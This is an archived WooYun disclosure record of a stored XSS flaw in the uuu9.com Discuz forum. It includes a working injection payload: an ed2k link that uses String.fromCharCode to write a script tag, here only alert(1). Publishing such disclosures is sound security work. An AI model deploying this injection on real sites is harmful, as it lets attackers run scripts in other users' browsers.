游久论坛存储型xss

编号56938
Urlhttp://www.wooyun.org/bug.php?action=view&id=56938
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题游久论坛存储型xss
漏洞类型XSS跨站脚本攻击
厂商www.uuu9.com
白帽子Sunshie
提交日期2014-04-14 16:43:00
公开日期2014-04-19 16:44:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签存储型xss
关注数0
收藏数0
白帽评级
白帽自评rank5
厂商评级
厂商评rank0
漏洞简介
None
漏洞细节


http://bbs.uuu9..com
发表帖子 帖子内容写

ed2k://|file|test|'+document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))+'|test/

POC

xss.png

修复方案

升级 Discuz

状态信息 2014-04-14: 细节已通知厂商并且等待厂商处理中
2014-04-19: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None
回应信息危害等级:无影响厂商忽略忽略时间:2014-04-19 16:44